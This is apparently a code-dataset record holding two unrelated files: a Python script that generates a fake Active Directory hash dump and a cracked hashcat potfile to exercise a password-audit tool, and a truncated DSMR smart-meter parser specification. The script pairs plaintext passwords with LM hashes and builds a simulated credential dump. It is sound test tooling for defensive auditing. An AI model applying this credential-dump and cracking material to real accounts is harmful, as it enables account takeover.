c0417928b6351035bb5da891e7dea86d3445e0cf
|
[
"MIT"
] | 14
|
2016-11-29T15:25:52.000Z
|
2021-06-22T18:01:54.000Z
|
sample_data/base/gendata.py
|
bennettwarner/DPAT
|
c0417928b6351035bb5da891e7dea86d3445e0cf
|
[
"MIT"
] | 136
|
2016-11-23T00:57:19.000Z
|
2022-03-02T08:53:53.000Z
|
#!/usr/bin/python
# Generates fake Active Directory sample data (an NTDS-style hash dump plus a
# hashcat potfile) for exercising the DPAT reporting tool.
import random,hashlib,binascii, os
cwd = os.getcwd()
print(cwd)
# Input word lists: first names, last names and passwords, one entry per line.
f_first = open("sample_data/base/first.txt")
f_last = open("sample_data/base/last_small.txt")
f_passwords = open("sample_data/base/subset-rockyou.txt")
# Output: the list of generated domain-admin accounts (domain\user per line).
f_das= open("sample_data/Domain Admins.txt","w")
first_list=list(f_first)
count_first = 0  # rotating index into first_list; wraps when exhausted
# Accounts are randomly spread over these domains; admins always land in [1].
domains = [ "parent.domain.com","child.domain.com","sister.domain.com"]
# Fixed domain-admin accounts with their (intentionally weak) passwords.
domain_admins = {
    'Agnes.Aarons-admin':'reallylongone',
    'Cliff.Adames-admin':'PasswordsAreHardToRemember',
    'Alex.Revis-admin':'57kdhfls*%2',
    'Gilbert.Settle-admin':'Ford57andGolf',
    'Cory.Ruhoff-admin':'NewPassword4Work',
    'Damian.Scarver-admin':'domainAdminPass',
    'Oscar.Veyna-admin':'ShirtsNSkins',
    'Rex.Vidot-admin':'1997hereo',
    'Scot.Viles-admin':'sparklesparkleZAP',
    'Burton.Vonner-admin':'VonnerPass16',
    'Dayna.Wade-admin':'Winter16',
    'Dustin.Wahlund-admin':'Frank-did-it',
    'Earnestine.Waiau-admin':'HappyTogether16',
    'Emerson.Wala-admin':'Washington87',
    'Sallie.Zych-admin':'77qwerty88',
    'Samuel.Zysk-admin':'Zundk8*&^',
    'Rosalinda.Zusman-admin':'Making Up Passwords is Hard',
    'Roman.Zurek-admin':'goFigure8',
    'Celia.Mcintosh-admin':'WikiWiki4What',
    'Celeste.Mcintire-admin':'2beornot2be',
    'Cecil.Mcinnis-admin':';kleknklk',
    'Brendan.Mcgriff-admin':'DontForget1',
    'Booker.Mcgraph-admin':'DaisyMisty1',
    'Bobbie.Mcgrane-admin':'P@sswo0rd16',
    'Clint.Hollifield-admin':'1997Married',
    'Coleen.Hollinghead-admin':'MickyMouse56',
    'Jackie.Dimodica-admin':'JerermyNHanna2',
    'Isabella.Dimitroff-admin':'Anastasia',
    'Horace.Dimarco-admin':'LovedByYou',
    'Herbert.Dils-admin':'DiamondRIO3',
    'Hazel.Dillman-admin':'L1ke1T',
    'Rex.Beadling-admin':'ITdoma1n@dmin',
    'Reggie.Beacher-admin':'WorldTurn@round',
    'Raul.Beaber-admin':'Lovemybug2003',
    'Pete.Baysmore-admin':'Hard24get',
    'August.Mcginnis-admin':'W$%23eu&*!rhs0'
}
lm_dict = { 'NotTooHard':'5B9D1AFCC9784729ADD5B1A41F2CB2C0','GoBeavErs1997':'94068F2F1CD1EAF27F76AAABE8E8789D','W$%23eu&*!rhs0':'4CE5B0C344FDD1038930410E6B652F2C','edward!':'67449A7AB9FDFA3AAAD3B435B51404EE','edhardy':'3AF628952D3CBDADAAD3B435B51404EE','ededed':'564B1B69A0CD5B23AAD3B435B51404EE','eddie22':'E3F874C4772EDC14AAD3B435B51404EE','earth1':'01EB2BDB90E4B363AAD3B435B51404EE','eagles36':'99223CC16C15AFCDC81667E9D738C5D9','dylanc':'BA0997645137628BAAD3B435B51404EE','dylanb':'4C72E2913A32E8A4AAD3B435B51404EE','dulceteamo':'0F8C1562718B774A6905068007DD26FD','dude1234':'4107C659B6183D65FF17365FAF1FFE89','druglord':'AC1F31C2E70BCB654A3B108F3FA6CB6D','droppie':'07E0ED6353B36D0AAAD3B435B51404EE','drink':'62B7CD49704064BDAAD3B435B51404EE','dragon17':'4097A469B4C52C1D7C3113B4A1A5E3A0','dracko':'A9327557F0E7E4FDAAD3B435B51404EE','downlow':'B44617E2CA667704AAD3B435B51404EE','douloveme':'62D3291BD468609863E11CD7E7F6092C','dothack':'6EAD70E9C296822BAAD3B435B51404EE','dotaallstar':'2987CC09184A44DE2201161DEDBA27A2','dorin':'947EB89A035D9D34AAD3B435B51404EE','dontspeak':'3B4F679F335D1535F04D685C382B531C','donnalyn':'A8E4E642B0A16CB6E72C57EF50F76A05','donnabelle':'97C88C474C40FE9589AF081E0305AC84','donika':'E5BF9342F4E51BA6AAD3B435B51404EE','dominate':'8C0D796F72023FB017306D272A9441BB','dolphy':'E75827B521C31229AAD3B435B51404EE','dollars1':'D456D433BC6A41B9C2265B23734E0DAC','doitbig':'E13F262D76132450AAD3B435B51404EE','doinita':'CA217F811088BC03AAD3B435B51404EE','dogandcat':'78028473533F1F269D4D37E81433E320','dobby':'CB94142B12F47F70AAD3B435B51404EE','dmarie':'B6ECEACBE041745CAAD3B435B51404EE','djones':'976EC97B7362B073AAD3B435B51404EE','divya':'DB9BDEDFC37408AFAAD3B435B51404EE','disney365':'DA505805AB7FCF926AB0B9B4DA013120','discoball':'82D8597A58DDB87C066B9E64566C2479','diogenes':'452265562B3B49B293E28745B8BF4BA6','dingaling':'D220E3D19587CFFCDD4218F5E59DD23A','dinamovista':'DD28D12979294E0C9A7853FCD68523F6','dimsum':'14BB788F701AC833AAD3B435B51404EE','dientes':'316A62A9E5
078672AAD3B435B51404EE','diegoandres':'631D8A94ACF9ADF45F6B9B201665ECFF','diego14':'AE310716574EDF80AAD3B435B51404EE','diego13':'B466FE535D0D691CAAD3B435B51404EE','dick12':'8A49C00370347B9BAAD3B435B51404EE','dianna1':'713505C5D104BA61AAD3B435B51404EE','diablo69':'A3BE40622851765909752A3293831D17','dhianne':'8D78D2735A3A4379AAD3B435B51404EE','devon7':'CC6DC07DB80BEF75AAD3B435B51404EE','devin11':'67B2EF958AF6F612AAD3B435B51404EE','deventer':'2013970F2DB4971C944E2DF489A880E4','devan1':'0ADD5FD620A482C2AAD3B435B51404EE','destined':'830BA0309744B2C24A3B108F3FA6CB6D','dessire':'975DB741FFD6D065AAD3B435B51404EE','design1':'4C1AB3AC6E05EB1DAAD3B435B51404EE','desiderio':'6A1C2D9A85892C26DF61CA35DEE5AA58','derry':'8416E3769D5FB679AAD3B435B51404EE','derrty':'28F566AF5658CCBAAAD3B435B51404EE','derek3':'9CF17DB1CB859EABAAD3B435B51404EE','derek22':'1B033D2858D542D9AAD3B435B51404EE','dennis01':'C8396E60C4987FB8C2265B23734E0DAC','denisuca':'9DC7423CB84514547584248B8D2C9F9E','denise14':'4E61A3280511BCC9FF17365FAF1FFE89','deniece':'6537F0EC75253266AAD3B435B51404EE','dementia':'75EEA72B6DE5C2EC7584248B8D2C9F9E','della1':'69666E0FCE54D3F1AAD3B435B51404EE','deliverance':'FC29BE7F95F1A281354EF550D6D616DF','delgadillo':'E77BDBF6AE2B3D930279963575FF2D48','deldel':'CDEA18537CB83F8FAAD3B435B51404EE','deion':'CE5205F9E3F1D158AAD3B435B51404EE','defoe18':'5811452C87D01332AAD3B435B51404EE','deeper':'A1886219150AE350AAD3B435B51404EE','deejay1':'B2DF80A944C9CB0CAAD3B435B51404EE','dee-dee':'1F17C1545FC9D496AAD3B435B51404EE','death2u':'539706F3890A934BAAD3B435B51404EE','dearly':'ACB63C873C70EDFFAAD3B435B51404EE','deadline':'D9989D2AEB2F392817306D272A9441BB','dead666':'56D719A22A00943EAAD3B435B51404EE','dayday123':'C7C9EB383B9066CCB75E0C8D76954A50','dayani':'269D8839491A9E6CAAD3B435B51404EE','day123':'76B6E26A7386D775AAD3B435B51404EE','daville':'1523F21BDB224D64AAD3B435B51404EE','davegrohl':'45B69A7B44018AB1EB90FCD89E798A49','dave21':'1173D0A5814FC7A5AAD3B435B51404EE','dario1':'684AAF0C9563CC51AAD3B4
35B51404EE','darin':'B29A4A5669527F0AAAD3B435B51404EE','darel':'963D8FB64DF80D69AAD3B435B51404EE','danyale':'1F1C9E6BDAF385BFAAD3B435B51404EE','dannyteamo':'C5660362EC7308AF6905068007DD26FD','danielle05':'41A5DF84E34D4393B0D866F8E2272AD6','daniel87':'D78FF2C06D3B72B27C3113B4A1A5E3A0','dani23':'F100ACF2FF2ADE44AAD3B435B51404EE','dani1':'175E69F189D25399AAD3B435B51404EE','dancok':'91824FD4185EE910AAD3B435B51404EE','dancingdiva':'81380963DA03E29697440C3488F02677','dancewithme':'C8B325EBE380D5C756496D0A2CF27A20','dancer26':'FEAE74B8E1947D9BC81667E9D738C5D9','dancer03':'894CBEC1AC35440D1AA818381E4E281B','dancechick':'449EC1BFA0F80FB272F8DA9D69F474D7','dancarter':'0F261E270277EE3E8963805A19B0ED49','dana1':'68E66D68E3AD2A0FAAD3B435B51404EE','dallas41':'73F3C9B1038B4422C2265B23734E0DAC','dallas15':'59CC3F718A14BD029C5014AE4718A7EE','dallas08':'C6FB9E6F7DB3F27036077A718CCDF409','dallas07':'C6FB9E6F7DB3F2707C3113B4A1A5E3A0','daisy!':'8EBDE0B1057D172EAAD3B435B51404EE','daine':'A6D663D5197DEA9AAAD3B435B51404EE','dailyn':'09F11E1A2F255F7FAAD3B435B51404EE','daddysboy':'69B507AAFDD2F72E655265D1314726C0','daddylove':'805D046BD8B55712B6FE535A75CB5552','daddy1234':'E42F9B3895F1F7B219F10A933D4868DC','daddy03':'82E76E96B3FCEFF3AAD3B435B51404EE','cynthia3':'BF65484F9EAA59351AA818381E4E281B','cymone':'DC9AF42629FA0778AAD3B435B51404EE','cutiepie16':'287ACD99E5A71EA619DB94ADC99423BF','cuters':'C435D7E4789C5286AAD3B435B51404EE','cupcake4':'E0009F6A725132CBFF17365FAF1FFE89','cunt69':'06AC388690048B3DAAD3B435B51404EE','cuddlebug':'375A10B1E5F43E45D17FDCAAB966EFA7','cuckoo':'E749D93A7BE08AC5AAD3B435B51404EE','cuadra':'C5D055D5402EA371AAD3B435B51404EE','cstrike':'4A3F0486D35169C7AAD3B435B51404EE','crystal11':'87650E47E4D141585D3872C04445E010','crystal01':'87650E47E4D1415873251AA2B4314B90','cristea':'64EC8CB777E8E2EDAAD3B435B51404EE','creeds':'FA0F7946A915FD06AAD3B435B51404EE','crazy4ever':'99EBBDF7699BA6D0B12FAE38C8ABEE13','crawfish':'0E4BABFD43EEC5C15ACDCD7C247FA83A','craig2':'2373F7A3D68F3C2B
AAD3B435B51404EE','crackwhore':'47CA74079D90D70D5468F2AD1F3B98BA','cowgirl07':'131BE2583DE651E718FCD526FB48A829','cowboys5':'CC954BF64510840D9C5014AE4718A7EE','courtney4':'063DE5A00E0BBA01744F2D424178DE49','cotita':'F6E1814A19F0DC3DAAD3B435B51404EE','costas':'03B9455205B8464AAAD3B435B51404EE','corona12':'D60C67A63F8821691D71060D896B7A46','cornbread1':'75ED8AC86B42E2B9042370C4583C388F','corey13':'372336BE0DB2D2C8AAD3B435B51404EE','coolaid':'27F0F886CD1DE9C3AAD3B435B51404EE','cookie04':'4DBF38B0A644F62FFF17365FAF1FFE89','contagious':'496CE23950764D4A5BE30F58D2A941D5','contabilitate':'332F012EDCC53D731DAB72D6A1727041','connor02':'17A1143A6E6E42821D71060D896B7A46','conner2':'62CFCE559EC73CADAAD3B435B51404EE','comunidad':'8AD5C85747A9E2BD9C749B84168D712D','common1':'9E39676A49F99C52AAD3B435B51404EE','columbus1':'CADD68BDB2673CA30CC3EB564B0F9047','colon':'1AB94AAF9FE60AE1AAD3B435B51404EE','coley1':'51BD657CEB4457CFAAD3B435B51404EE','coldheart':'0532CF033F5955B35F034D624633DBF9','codylinley':'B671C9AF04D37B08F15DB3BDBAD92750','cody07':'DB455B1B86B8A058AAD3B435B51404EE','cody04':'3DC6DD72755CCFE9AAD3B435B51404EE','coco08':'F26B193B103F6AD4AAD3B435B51404EE','cocknose':'A2D4DFAFA94D7B5D17306D272A9441BB','clubber':'4027C45050D0DC04AAD3B435B51404EE','cleo':'3CAB28372DB1715EAAD3B435B51404EE','clears':'E9596D59EDCD0C22AAD3B435B51404EE','claudia12':'FDAA24DE0BCBEB854207FD0DF35A59A8','civics':'A21064406DD6C682AAD3B435B51404EE','citron':'9840ABA3424EBA78AAD3B435B51404EE','cintakamu':'9564A655D10805450BBD7D4C25A4DEFA','ciclope':'C155BC1446E5101CAAD3B435B51404EE','chute':'8DBDFBAA0CF03C76AAD3B435B51404EE','chula12':'5A4C094D73768C02AAD3B435B51404EE','chuche':'0652223D8E88744DAAD3B435B51404EE','christians':'630505E57DC5617E8E4DD189F947B5EC','chrischris':'B6760E35ED0103CD85BB7C52C41086D7','chris83':'E2F432F581BF8148AAD3B435B51404EE','chris2005':'41973827B8184CF96FB9A7EF37043CD6','chonchis':'80AAA6EB2DC0233093E28745B8BF4BA6','chocorrol':'501E06987BD244E97BB1D8438F805B5C','chocolatelover'
:'81D330F45391D6CDD21334332AE253C7','choclate1':'B1067D8E77DD0072A202B0A0CC08E46E','chivas15':'BA237827413B85849C5014AE4718A7EE','chimes':'7C03C765BFC529A9AAD3B435B51404EE','chikitalinda':'6A5DF180A72046188315F2B502B247DC','chikis1':'04AE55C4E6F75BB5AAD3B435B51404EE','chickenwings':'5E9019CC921146AC00F4888F92F39DF9','chicharron':'A138C2D50AC9C5063140C07381B6A165','chica15':'B3D2CC98E2BC3F63AAD3B435B51404EE','chevygirl':'725DA578E9D54C1D2DCA4431C6F3913D','cherry9':'616778FE4E03EB13AAD3B435B51404EE','cherries2':'328FB4F46E4A4EDA74F23606C66022B0','cherie1':'A30A2797D55E44E1AAD3B435B51404EE','cheetah2':'0BEBB7B76F9F09A01D71060D896B7A46','cheeseontoast':'34DC70895752909D63C3F1914814DF78','cheese23':'1B8DB7D20C6C244B1AA818381E4E281B','cheese14':'3A5F48756650F617FF17365FAF1FFE89','cheer55':'ADF3815AE0113EE6AAD3B435B51404EE','cheene':'214BA788DBF79432AAD3B435B51404EE','chean':'4A07877A1FD2D2E0AAD3B435B51404EE','chassy':'3569B3396667A9A2AAD3B435B51404EE','charlie88':'528A05A387553DC56C4691C0029EBE9F','charlie27':'528A05A387553DC5025A32A63FE04BEC','charlie20':'528A05A387553DC5143F8BD9AE9E0363','charlie18':'528A05A387553DC58347BB1E72CC9F76','chaparra1':'CEF00CDAA153648F65C4A55F32B3BF85','chaochao':'A3EB50453623B039E68AA26A841A86FA','changed1':'67B011CF3539A3E3C2265B23734E0DAC','chalie':'E80D509ABABDE9C4AAD3B435B51404EE','chakas':'5ED7F084F1839FD7AAD3B435B51404EE','chad69':'BF34878165770EEEAAD3B435B51404EE','chachie':'3091167271E136C2AAD3B435B51404EE','chabe':'BF1008C067449CFFAAD3B435B51404EE','cha123':'84126D3AA15B64D0AAD3B435B51404EE','cha-cha':'F7E38693146CED75AAD3B435B51404EE','cfc123':'B10D8883941986DCAAD3B435B51404EE','cesar2':'745B312CE52C3F88AAD3B435B51404EE','ceriwis':'D0BA7E97FC3E9290AAD3B435B51404EE','centinela':'E7D941ADA594566EB09321E47427AF3C','cena11':'4656FDC59974A241AAD3B435B51404EE','cena01':'268D5E2B37583A0AAAD3B435B51404EE','celtic08':'4467856BF476733B36077A718CCDF409','cedes':'8A337C28CE3265FFAAD3B435B51404EE','cecilita':'6D02B4EFE4C3AE017584248B8D2C9F9E','
cdcdcd':'4DAB65D458627A62AAD3B435B51404EE','cbr900rr':'ADF862771AC0FA35944E2DF489A880E4','cazares':'19E925C350B4A289AAD3B435B51404EE','UpPeRlOwEr':'3630E260BC5D7049249A4622CE4C83C8','HarD222cRacK':'051B0FC10EAE6A6D22EF373F485DF6BD','resgocswit7hWQ':'90C0059BFB22BB44F657FC2061517840','lastBUTnotLEAS':'47AAF1C238FCBAB597FAF9A0F46316C1'}
# Passwords whose NT hash is deliberately never written to the potfile; they
# only show up via their weak LM halves below.
dontCrackWithNT = ["W$%23eu&*!rhs0","UpPeRlOwEr","HarD222cRacK","resgocswit7hWQ","lastBUTnotLEAS"]
# Users whose NT hashes are never marked as cracked in the potfile.
dontNTCrackTheseUsers = ["Bobbie.Mcgrane-admin","Rosalinda.Zusman-admin","Cecil.Mcinnis-admin", "Cory.Ruhoff-admin","Cliff.Adames-admin","Samuel.Zysk-admin"]
# Output files: the simulated NTDS dump and the matching "cracked" potfile
# that DPAT cross-references against it.
f = open("customer.ntds", "w")
f2 = open("hashcat.potfile", "w")
wroteRHS = False  # the split LM halves of this one password are written only once

for last in f_last:
    add_admin = False
    # Cycle through the first-name list, wrapping around when it is exhausted.
    if count_first < len(first_list):
        firstName = first_list[count_first].rstrip().title()
        count_first = count_first + 1
    else:
        count_first = 0
        firstName = first_list[count_first].rstrip().title()
    lastName = last.rstrip().title()
    userName = firstName + "." + lastName
    if userName + "-admin" in domain_admins:
        userName = userName + "-admin"
    password = f_passwords.readline().rstrip()
    # Python 3 fix: dict.has_key() was removed -- use the `in` operator.
    if password in domain_admins:
        # Python 3 fix: print is a function, not a statement.
        print("Warn: duplicated password for administrator: " + password)
    rid = str(random.randint(10000, 500000))
    domain = random.choice(domains)
    if userName in domain_admins:
        # Domain admins keep their fixed password, always live in the child
        # domain, and are recorded in the Domain Admins group file.
        password = domain_admins[userName]
        domain = domains[1]
        f_das.write(domain + "\\" + userName + "\n")
        if userName in ["Agnes.Aarons-admin", "Alex.Revis-admin", "Burton.Vonner-admin", "Pete.Baysmore-admin"]:
            add_admin = True
    # NT hash is MD4 over the UTF-16LE password. hexdigest() already yields a
    # lowercase hex str (Python 3 fix: hexlify() would return bytes here).
    # NOTE(review): 'md4' may be unavailable in OpenSSL 3.x default builds.
    nt_hash = hashlib.new('md4', password.encode('utf-16le')).hexdigest()
    lm_hash = "aad3b435b51404eeaad3b435b51404ee"  # this is the LM hash of a blank password
    if password in lm_dict:
        lm_hash = lm_dict[password]
    f.write(domain + "\\" + userName + ":" + rid + ":" + lm_hash.lower() + ":" + nt_hash + ":::\n")
    # simulating password history, up to 24 entries generated for each user,
    # 78% of these simulated as cracked
    for x in range(0, 24):
        if random.randrange(0, 100) < 5:
            break
        hist_password = password + str(24 - x)
        hist_nt_hash = hashlib.new('md4', hist_password.encode('utf-16le')).hexdigest()
        f.write(domain + "\\" + userName + "_history" + str(x) + ":" + rid + ":aad3b435b51404eeaad3b435b51404ee:" + hist_nt_hash + ":::\n")
        if random.randrange(1, 100) < 78:
            f2.write(hist_nt_hash + ":" + hist_password + "\n")
    # ~78% of regular passwords (and every password with a known LM hash) are
    # marked as NT-cracked, except the deliberately held-back ones.
    if (password not in dontCrackWithNT) and (userName not in dontNTCrackTheseUsers) and (password in lm_dict or random.randrange(1, 100) < 78):
        f2.write(nt_hash + ":" + password + "\n")
    if password in dontCrackWithNT:
        # LM hashes crack in two independent halves; emit each potfile half
        # separately (uppercased, as LM is case-insensitive).
        left_pass = password[0:8].upper()
        right_pass = password[8:15].upper()
        left_hash = lm_dict[password][0:16].lower()
        right_hash = lm_dict[password][16:32].lower()
        if password != "W$%23eu&*!rhs0" or not wroteRHS:
            f2.write(left_hash + ":" + left_pass + "\n")
            f2.write(right_hash + ":" + right_pass + "\n")
            if password == "W$%23eu&*!rhs0":
                wroteRHS = True
    if add_admin:
        # BUG FIX: str.rstrip("-admin") strips any trailing characters from
        # the set {-,a,d,m,i,n}, not the literal suffix; slice it off instead.
        # add_admin is only ever set for '-admin' accounts, so this is safe.
        plain_name = userName[:-len("-admin")]
        f.write(domain + "\\" + plain_name + ":" + rid + ":" + lm_hash.lower() + ":" + nt_hash + ":::\n")
        f2.write("aad3b435b51404ee:\n")  # blank LM half "cracked" to the empty string

f.close()
f2.close()
f_first.close()
f_last.close()
f_passwords.close()
| 132.25641
| 10,336
| 0.79695
| 1,087
| 15,474
| 11.280589
| 0.635695
| 0.005709
| 0.00367
| 0.004404
| 0.030664
| 0.019899
| 0.019899
| 0
| 0
| 0
| 0
| 0.333699
| 0.056482
| 15,474
| 117
| 10,337
| 132.25641
| 0.506164
| 0.010405
| 0
| 0.036364
| 0
| 0
| 0.705963
| 0.498792
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.254545
| 0.009091
| null | null | 0.018182
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1341ded9e5e9d4af3dd9ac99860ea134cb0abe48
| 8,086
|
py
|
Python
|
dsmr_parser/telegram_specifications.py
|
avandermeer/dsmr_parser
|
dc902a83e9fa683bac50e40251c175c79974d734
|
[
"MIT"
] | null | null | null |
dsmr_parser/telegram_specifications.py
|
avandermeer/dsmr_parser
|
dc902a83e9fa683bac50e40251c175c79974d734
|
[
"MIT"
] | null | null | null |
dsmr_parser/telegram_specifications.py
|
avandermeer/dsmr_parser
|
dc902a83e9fa683bac50e40251c175c79974d734
|
[
"MIT"
] | null | null | null |
from decimal import Decimal
from copy import deepcopy
from dsmr_parser import obis_references as obis
from dsmr_parser.parsers import CosemParser, ValueParser, MBusParser, ProfileGenericParser
from dsmr_parser.value_types import timestamp
from dsmr_parser.profile_generic_specifications import BUFFER_TYPES, PG_HEAD_PARSERS, PG_UNIDENTIFIED_BUFFERTYPE_PARSERS
"""
dsmr_parser.telegram_specifications
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains DSMR telegram specifications. Each specifications describes
how the telegram lines are parsed.
"""
# DSMR v2.2 telegram specification: maps each OBIS reference to the parser
# used for the corresponding telegram line. v2.2 telegrams carry no checksum.
V2_2 = {
    'checksum_support': False,
    'objects': {
        obis.EQUIPMENT_IDENTIFIER: CosemParser(ValueParser(str)),
        obis.ELECTRICITY_USED_TARIFF_1: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_USED_TARIFF_2: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_DELIVERED_TARIFF_1: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_DELIVERED_TARIFF_2: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_ACTIVE_TARIFF: CosemParser(ValueParser(str)),
        obis.CURRENT_ELECTRICITY_USAGE: CosemParser(ValueParser(Decimal)),
        obis.CURRENT_ELECTRICITY_DELIVERY: CosemParser(ValueParser(Decimal)),
        obis.ACTUAL_TRESHOLD_ELECTRICITY: CosemParser(ValueParser(Decimal)),
        obis.ACTUAL_SWITCH_POSITION: CosemParser(ValueParser(str)),
        obis.TEXT_MESSAGE_CODE: CosemParser(ValueParser(int)),
        obis.TEXT_MESSAGE: CosemParser(ValueParser(str)),
        obis.EQUIPMENT_IDENTIFIER_GAS: CosemParser(ValueParser(str)),
        obis.DEVICE_TYPE: CosemParser(ValueParser(str)),
        obis.VALVE_POSITION_GAS: CosemParser(ValueParser(str)),
        obis.GAS_METER_READING: MBusParser(
            ValueParser(timestamp),
            ValueParser(int),
            ValueParser(int),
            ValueParser(int),
            ValueParser(str),  # obis ref
            ValueParser(str),  # unit, position 5
            ValueParser(Decimal),  # meter reading, position 6
        ),
    }
}
# DSMR v3 telegrams parse identically to v2.2.
# NOTE(review): this is an alias, not a copy -- mutating V3 also mutates V2_2.
V3 = V2_2
# DSMR v4 telegram specification. v4 adds checksum support, power-failure
# statistics, voltage sag/swell counters and per-phase instantaneous values.
V4 = {
    'checksum_support': True,
    'objects': {
        obis.P1_MESSAGE_HEADER: CosemParser(ValueParser(str)),
        obis.P1_MESSAGE_TIMESTAMP: CosemParser(ValueParser(timestamp)),
        obis.EQUIPMENT_IDENTIFIER: CosemParser(ValueParser(str)),
        obis.ELECTRICITY_USED_TARIFF_1: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_USED_TARIFF_2: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_DELIVERED_TARIFF_1: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_DELIVERED_TARIFF_2: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_ACTIVE_TARIFF: CosemParser(ValueParser(str)),
        obis.CURRENT_ELECTRICITY_USAGE: CosemParser(ValueParser(Decimal)),
        obis.CURRENT_ELECTRICITY_DELIVERY: CosemParser(ValueParser(Decimal)),
        obis.SHORT_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
        obis.LONG_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
        # The failure log is a profile-generic buffer, not a single value.
        obis.POWER_EVENT_FAILURE_LOG:
            ProfileGenericParser(BUFFER_TYPES,
                                 PG_HEAD_PARSERS,
                                 PG_UNIDENTIFIED_BUFFERTYPE_PARSERS),
        obis.VOLTAGE_SAG_L1_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SAG_L2_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SAG_L3_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SWELL_L1_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SWELL_L2_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SWELL_L3_COUNT: CosemParser(ValueParser(int)),
        obis.TEXT_MESSAGE_CODE: CosemParser(ValueParser(int)),
        obis.TEXT_MESSAGE: CosemParser(ValueParser(str)),
        obis.DEVICE_TYPE: CosemParser(ValueParser(int)),
        obis.INSTANTANEOUS_CURRENT_L1: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_CURRENT_L2: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_CURRENT_L3: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L1_POSITIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L2_POSITIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L3_POSITIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L1_NEGATIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L2_NEGATIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L3_NEGATIVE: CosemParser(ValueParser(Decimal)),
        obis.EQUIPMENT_IDENTIFIER_GAS: CosemParser(ValueParser(str)),
        obis.HOURLY_GAS_METER_READING: MBusParser(
            ValueParser(timestamp),
            ValueParser(Decimal)
        )
    }
}
# DSMR v5 telegram specification. Compared to v4 it adds the total imported
# energy and per-phase instantaneous voltages, and drops the text-message code.
V5 = {
    'checksum_support': True,
    'objects': {
        obis.P1_MESSAGE_HEADER: CosemParser(ValueParser(str)),
        obis.P1_MESSAGE_TIMESTAMP: CosemParser(ValueParser(timestamp)),
        obis.EQUIPMENT_IDENTIFIER: CosemParser(ValueParser(str)),
        obis.ELECTRICITY_IMPORTED_TOTAL: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_USED_TARIFF_1: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_USED_TARIFF_2: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_DELIVERED_TARIFF_1: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_DELIVERED_TARIFF_2: CosemParser(ValueParser(Decimal)),
        obis.ELECTRICITY_ACTIVE_TARIFF: CosemParser(ValueParser(str)),
        obis.CURRENT_ELECTRICITY_USAGE: CosemParser(ValueParser(Decimal)),
        obis.CURRENT_ELECTRICITY_DELIVERY: CosemParser(ValueParser(Decimal)),
        obis.LONG_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
        obis.SHORT_POWER_FAILURE_COUNT: CosemParser(ValueParser(int)),
        # The failure log is a profile-generic buffer, not a single value.
        obis.POWER_EVENT_FAILURE_LOG:
            ProfileGenericParser(BUFFER_TYPES,
                                 PG_HEAD_PARSERS,
                                 PG_UNIDENTIFIED_BUFFERTYPE_PARSERS),
        obis.VOLTAGE_SAG_L1_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SAG_L2_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SAG_L3_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SWELL_L1_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SWELL_L2_COUNT: CosemParser(ValueParser(int)),
        obis.VOLTAGE_SWELL_L3_COUNT: CosemParser(ValueParser(int)),
        obis.INSTANTANEOUS_VOLTAGE_L1: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_VOLTAGE_L2: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_VOLTAGE_L3: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_CURRENT_L1: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_CURRENT_L2: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_CURRENT_L3: CosemParser(ValueParser(Decimal)),
        obis.TEXT_MESSAGE: CosemParser(ValueParser(str)),
        obis.DEVICE_TYPE: CosemParser(ValueParser(int)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L1_POSITIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L2_POSITIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L3_POSITIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L1_NEGATIVE: CosemParser(ValueParser(Decimal)),
        obis.INSTANTANEOUS_ACTIVE_POWER_L2_NEGATIVE: CosemParser(ValueParser(Decimal)),
